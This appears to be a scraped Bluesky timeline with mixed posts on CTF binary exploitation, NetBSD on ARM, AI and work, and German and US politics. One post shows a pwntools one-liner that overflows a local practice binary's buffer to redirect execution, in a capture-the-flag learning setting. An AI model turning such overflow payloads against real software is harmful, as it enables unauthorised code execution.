pwning NetBSD-aarch64 (ARM)
- www.feyrer.de/NetBSD/blog....
#pwn #binaryexploitation #ctf #cybersecurity #pwntools #gdb #netbsd #arm #aarch64
08.03.2026 18:37
👍 0
🔁 0
💬 0
📌 0
pwning NetBSD-aarch64 (ARM)
- www.feyrer.de/NetBSD/blog....
#pwn #binaryexploitation #ctf #cybersecurity #pwntools #gdb #netbsd #arm #aarch64
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar 4 21:02:00 UTC 2026 mkrepro@mkrepro.NetBSD.org:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm
(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA�
Goodbye, winner.
This afternoon's fun: pwning NetBSD-aarch64 (ARM)
[details in comments - why is there such a small limit in Bluesky?]
#pwn #netbsd #binaryexploitation #arm #aarch64 #pwntools #gdb
looks very interesting - thanks for the great work!
Now where do I find time to play with this? :)
VulHunt: vulnerability detection framework
github.com/vulhunt-re/v...
Accompanying blog series:
www.binarly.io/blog/vulhunt...
www.binarly.io/blog/vulhunt...
www.binarly.io/blog/vulnera...
www.binarly.io/blog/vulhunt...
www.binarly.io/blog/agentic...
#infosec
MCP is the new HTTP :-)
Testdriving NetBSD-11.0RC2 on ARM hardware (in VM!)
www.feyrer.de/NetBSD/blog....
#netbsd #arm #qemu
What a hell of a challenge!
🎉 Successfully completed Yansanity (Easy)! 🎉
🎉 Successfully completed Yansanity (Hard)! 🎉
Did you ever reverse-engineer a CPU & operating system where you didn't know the instruction opcodes, registers, CPU flags, syscall numbers etc.?
#pwncollege #ctf #y85
... and obviously the image was hand-generated, as AI totally failed on me to make this one pretty
#contentsbeforedesign
3/3
3. The middle is getting thinner.
Due to reduction of skilled work force, the (human) skill gap will increase.
My open question:
How do we train future experts so we don’t lose as people and as a society?
How do you see this development in your field?
2/x
1. More people achieve better results.
AI raises the baseline significantly. That’s a good thing.
2. True expertise is becoming even scarcer and more difficult.
Who will understand training data, models, and system behavior deeply enough to improve them?
1/3
Irony of the day:
I’m writing this post with AI, musing about how AI is changing our society.
I currently observe three effects:
#AI #Skills #FutureOfWork #Learning #Leadership #Productivity
No more nodejs/npm/ts crap, smolClaw is now based on picoclaw github.com/NetBSDfr/smo...
Frage mich immer warum ihr alle euren Pessimismus hier so abfeiert. Macht ihr das draußen auch so?
Wäre mehr für Goodnews, Geschichten über coole Menschen, die was weiterbringen etc.
Geht das? 😘
"Computer, what's new?" - why search for news and filter what's (not) interesting, if OpenClaw can do that with my "hfnews" skill.
Enjoy: clawhub.ai/huberteff/hf...
#ai #clawbot #openclaw #hfnews #stopwords #news #agenticai
Binary patching in ghidra in three easy steps:
1) Clear ghidra's idea of what the bytes are
2) Inspect the raw bytes and plan with what to overwrite
3) Overwrite e.g. with NOP and see ghidra eliminate an if-clause
#ctf #cybersecurity #ghidra #binaryreverseengineering #patch
What do stack canaries dream of?
#ctf #cybersecurity #x86 #stack #canary
Auch 2025 bieten wieder Hackspaces und andere Orte die Möglichkeit, gemeinsam Vorträge zu streamen, zu hacken, Party zu machen und mehr. Der #39C3 ist überall, wo er gelebt wird: Congress Everywhere events.ccc.de/2025/12/20/3...
CTF Writeup: pwn.college - Advent of Pwn 2025
pwn.college is an educational cybersecurity platform by Arizona State University. Their Advent of Pwn 2025 released one challenge per day during December.
www.feyrer.de/CTF/CTF-Writ...
#ctf #cybersecurity #pwncollege #adventofpwn
Work hard, play hard - die letzten zwei Tage beruflich beim project networks Strategiegipfel Cybersecurity.
#cybersecurity #cyberresilience
Apple SEAR is hiring offensive security researchers!
We’re looking for talented researchers across multiple areas of security.
Check out the job description here:
jobs.apple.com/en-us/detail...
Feel free to reach out if you have any questions.
#infosec
"Challenges and Pitfalls while Emulating Six Current Icelandic Household Routers"
Evaluation of different tools for routers firmware emulation
(FACT, QEMU, EMUX, Qiling, Firmadyne, FAT, FirmAE, Pandawan, and EMBA)
skemman.is/bitstream/19...
#cybersecurity #embedded
Frame Maker 🔥
Ursprünglicher Beitrag: 23.social/@linuzifer/1...
So what working alternatives are there?
Ursprünglicher Beitrag: bsd.network/@imil/114317...
Ursprünglicher Beitrag: bsd.network/@jaypatelani...
Das Informationsfreiheitsgesetz in der bisherigen Form wollen wir mit einem Mehrwert für Bürgerinnen und Bürger und Verwaltung reformieren.
🔥🔥Wir haben gewonnen!🔥🔥
Keine Rede mehr im #Koalitionsvertrag von der Abschaffung des Informationsfreiheitsgesetzes!
Stattdessen soll's eine Reform mit "Mehrwert für Bürger*innen & Verwaltung" geben. Für uns kann das nur heißen: Weg frei für das #Transparenzgesetz!
fragdenstaat.de/dokumente/25...
Screenshot of a reddit post on r/fednews that reads: DOGE is at the Institue of Museum and Library Services right now, AM 03/20, to shut down the agency The Institute of Museum and Library Services is being raided by DOGE and the new Acting Director (also somehow DepSec of Labor) Keith Sonderling with the express intent to shut it down. Sonderling was sworn-in in the lobby of the office building (955 L'Enfant Plaza) and they are proceeding with quickly and quietly dismantling the agency. There is no major reporting on the death of IMLS. There are Deparment of Homeland Security personnel present - to bully a bunch of civil servants who administer grants to museums and libraries. IMLS offices are on the 4th floor of 955 L'Enfant. There is no media present to document this efficiency saving of .004% of the federal budget. Every library system in the country receives these grants. Museums in every state depend on them. Every penny disbursed is American tax dollars back in American communities. This is one of the 7 federal agencies offered up as a needless sacrificial lamb in the catastrophic resolution and last week's EO.
Screenshot in case the main post gets taken down